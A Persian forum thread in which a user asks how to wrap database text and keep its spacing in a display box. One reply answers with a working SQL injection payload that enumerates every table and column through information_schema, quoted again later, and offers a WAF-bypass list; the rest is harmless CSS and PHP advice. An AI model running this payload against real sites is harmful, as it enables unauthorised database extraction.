رفتن به مطلب
انجمن تیم امنیتی گارد ایران

نمایش داده ای از دیتابیس با مشخص کردن طول هر سطر


Gorilla
 اشتراک گذاری

ارسال های توصیه شده

سلام. ببخشید چطور می تونم داده ای از دیتابیس SQL رو درج، و طول هر سطر رو مشخص کنم؟ یعنی بگم مثلا به 500 پیکسل رسید، برو سطر بعدی. و دوم این که فاصله ها هم عینا تکرار بشن. یعنی اگر من متنی رو اینطوری                       نوشتم، همونطوری هم چاپ بشه.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

نقل قول

 

سلام دوست خوبم 😉

یک دستور کلی برای بیرون کشیدن اطلاعات کامل موجود در دیتابیس واست قرار میدم که باید در یکی از ستون های آسیب پذیر قرار بدی فقط اینو یادت باشه بعضی مواقع به بایپس نیاز داره

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)

اگر برای نشان دادن ستون آسیب پذیر به مشکل بر خوردی لیستی از بایپس هایی رو واست نوشتم قرار میدم دانلود کن که بتونی خیلی راحت حساسیت سایت رو از بین ببری

اگر بازم سوال بود در خدمتم

با تشکر 💖 Mr_Zero

wafbyepass.txt

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

در در 5 آبان 1399 در 02:28، Mr_Zero گفته است :

سلام دوست خوبم 😉

یک دستور کلی برای بیرون کشیدن اطلاعات کامل موجود در دیتابیس واست قرار میدم که باید در یکی از ستون های آسیب پذیر قرار بدی فقط اینو یادت باشه بعضی مواقع به بایپس نیاز داره

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)

اگر برای نشان دادن ستون آسیب پذیر به مشکل بر خوردی لیستی از بایپس هایی رو واست نوشتم قرار میدم دانلود کن که بتونی خیلی راحت حساسیت سایت رو از بین ببری

اگر بازم سوال بود در خدمتم

با تشکر 💖 Mr_Zero

wafbyepass.txt 3.83 kB · 1 download

سلام. دست شما درد نکنه. ولی من تست نفوذ که نمی خواستم انجام بدم 😁.  برای یه چیزی مثل چت روم می خواستم 😊. اما خب دست شما درد نکنه این هم شاید روزی به دردم خورد ☺️.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

شاید اسم تاپیک رو بد گذاشتم.

این عکس رو ببینید:Vozooh.png.e770e10a54b53d845ae2a4b1dbed9272.png

من یه کادری براش تعیین کردم ولی ازش زده بیرون. چطور مشخص کنم که وقتی به ته اون کادر رسید بره سطر بعدی؟ اینم بگم که از دیتابیس قراره این متن رو به کاربر نشون بدم. یعنی موضوع تاپیک اون قدر ها هم بی ربط نیست ☺️.

		white-space: pre-wrap;
		word-wrap: break-word;

این ها رو هم تو یک تاپیک دیگه یه دوستی که اسمش یادم نیست که ازش تشکر کنم گفته بود استفاده کنم. برای word-wrap مقادیر دیگرش رو هم امتحان کردم ولی درست نشد. ممنون می شم راهنمایی کنید. :D

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

در 5 ساعت قبل، Gorilla گفته است :

شاید اسم تاپیک رو بد گذاشتم.

این عکس رو ببینید:Vozooh.png.e770e10a54b53d845ae2a4b1dbed9272.png

من یه کادری براش تعیین کردم ولی ازش زده بیرون. چطور مشخص کنم که وقتی به ته اون کادر رسید بره سطر بعدی؟ اینم بگم که از دیتابیس قراره این متن رو به کاربر نشون بدم. یعنی موضوع تاپیک اون قدر ها هم بی ربط نیست ☺️.


		white-space: pre-wrap;
		word-wrap: break-word;

این ها رو هم تو یک تاپیک دیگه یه دوستی که اسمش یادم نیست که ازش تشکر کنم گفته بود استفاده کنم. برای word-wrap مقادیر دیگرش رو هم امتحان کردم ولی درست نشد. ممنون می شم راهنمایی کنید. :D

سلام 

اگر از php استفاده میکنید strlen برای بدست اوردن تعداد کاراکتر ها بدردتون میخوره

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...